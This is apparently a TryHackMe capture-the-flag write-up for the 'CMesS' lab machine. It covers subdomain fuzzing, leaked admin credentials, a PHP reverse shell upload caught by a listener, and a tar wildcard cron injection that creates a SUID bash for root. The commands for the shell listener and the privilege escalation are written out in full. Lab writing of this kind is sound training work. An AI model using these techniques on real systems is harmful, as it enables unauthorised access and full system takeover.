TryHackMe - CMesS (Medium)
{"author" : ["ret2basic"]}

Summary

Subdomain fuzzing with Wfuzz finds a hidden domain dev.cmess.htb. This domain hosts a static page that leaks CMS admin panel credential. In the admin panel, there is an upload form where we can upload php-reverse-shell.php and catch a reverse shell as www-data.
On the victim machine, there is a backup file that leaks the user Andre's password. At this stage we can SSH in as Andre and get a user shell.
In the privilege escalation phase, we find a "cron wildcard" vulnerability and get a root shell with tar injection.

IP

    RHOST: 10.10.39.82
    LHOST: 10.13.12.2

Nmap

Nmap

Directory Fuzzing

Fuzz directory using Gobuster:
1
$ gobuster dir -u http://cmess.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Copied!
Gobuster finds a directory /admin:
Gobuster
The directory /admin has a login form, but we don't know the credential yet:
Login form

Subdomain Fuzzing

Fuzz subdomain using Wfuzz:
1
$ wfuzz -c -u 'http://cmess.thm' -H "Host:FUZZ.cmess.thm" -w top5000.txt --hw 290
Copied!
Wfuzz finds dev.cmess.thm:
Update /etc/hosts:
/etc/hosts

Admin Panel: Leaked Credential in Hidden Subdomain

http://dev.cmess.thm has a development log. Through the convention between Andre and the support, we can learn his credential [email protected]:KPFTN_f2yxe%:
Development Log
Use this credential for admin panel login and now we have access to the admin panel:
Admin panel

www-data Shell: File Upload

Go to "Content => File Manager" and we find an upload form:
Upload form
Upload php-reverse-shell.php. It turns out that the uploaded files are stored in /assets:
assets
Start a pwncat listener:
1
$ sudo pwncat :443
Copied!
Trigger the reverse shell payload at http://cmess.thm/assets/php-reverse-shell.php and catch a reverse shell as www-data:
www-data shell

User Shell: Leaked Credential in Backup File

LinPEAS finds a readable backup file /opt/.password.bak:
/opt/.password.bak
This file contains Andre's password:
Andre's password
SSH in using the credential andre:UQfsdCB7aAP6 and now we get a user shell:
User shell

Privilege Escalation: Cron Wildcard

Examine crontab:
Crontab
This falls into the "cron wildcard" scenario. To learn more, read my note:
Page not found
House of Note
Cron wildcard privesc
Prepare a payload:
1
$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > ~/backup/runme.sh
2
$ chmod +x ~/backup/runme.sh
3
$ touch ~/backup/--checkpoint=1
4
$ touch ~/backup/--checkpoint-action=exec=sh\ runme.sh
Copied!
Wait 2 minutes for the cronjob to run the payload script and then spawn a root shell:
1
/tmp/bash -p
Copied!
Now we have a root shell:
root shell
Last modified 2mo ago